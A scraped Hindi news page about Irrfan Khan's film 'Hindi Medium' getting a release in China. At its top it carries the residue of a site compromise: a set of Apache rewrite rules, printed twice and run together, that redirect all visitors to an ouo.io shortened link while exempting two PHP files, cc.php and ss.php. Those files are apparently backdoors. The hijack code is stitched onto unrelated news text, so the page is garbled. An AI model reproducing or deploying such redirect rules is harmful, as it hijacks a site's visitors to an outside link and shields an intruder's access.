
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 924
Previous Nextमुंबई। चीन में आमिर खान और सलमान खान की फिल्मों की सफलता के बाद अब इरफान खान भी एंट्री लेने वाले हैं। खबर है कि उनकी फिल्म 'हिंदी मीडियम' चीन में रिलीज होने वाली है। इरफान की ये फिल्म 4 अप्रैल को चीनी बॉक्स ऑफिस पर आएगी। चीन में विदेशी फिल्मों को प्रदर्शित किए जाने को लेकर एक तय संख्या फिक्स की गई है। इसके तहत हर साल कुछ ही विदेशी फिल्म चीन में रिलीज हो पाती हैं। लेकिन इन सबके बीच चीन में भारतीय फिल्मों की उपस्थिति बढ़ रही है। दर्शक भी हिंदी सिनेमा को खूब प्यार दे रहे हैं।
भारत की शिक्षा प्रणाली पर बनी 'हिंदी मीडियम' की रिलीज के लिए चीनी अधिकारियों ने पोस्टर के बजाय फिल्म के टीजर पोस्टर को चुना है। टी-सीरीज के निर्माता भूषण कुमार ने जारी बयान में कहा, "इस कहानी में एक कमाल का मोड़ है। 'हिंदी मीडियम' का कंटेट बेहतरीन है और इरफान एक अंतर्राष्ट्रीय स्तर पर लोकप्रिय प्रतिभाशाली कलाकार हैं।" 'हिंदी मीडियम' साकेत चौधरी के डायरेक्शन में बनी है। इसमें पाकिस्तानी एक्ट्रेस सबा कमर भी अहम रोल में हैं। इस फिल्म को यहां भी काफी पसंद किया गया था। अब चीनी बॉक्स ऑफिस पर इसकी धमाकेदार कमाई का इंतजार है।